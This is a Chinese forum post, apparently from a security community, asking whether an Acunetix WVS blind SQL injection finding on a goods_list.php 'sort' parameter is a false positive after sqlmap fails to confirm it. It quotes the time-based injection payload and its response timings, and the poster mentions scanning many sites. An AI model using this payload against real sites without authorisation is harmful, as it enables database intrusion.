扫了很多的站,WVS报了一些高危漏洞,SQL盲注的,大致都是这样的请求
This vulnerability affects /home/contents/goods/goods_list.php.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
URL encoded GET input
sort was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
Tests performed:
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ => 10.109 s
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ => 3.854 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 6.864 s
这种对参数的构造if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/到底是想做什么呢?
难道就为了看一下能不能执行这个函数么?
然后我用SQLMAP去测试这个注入点,结果就是不能注入~ 属于WVS误报么?
看别人搞都很简单 啊,随便搞搞就各种都出来,求帮助
[课程]Linux pwn 探索篇!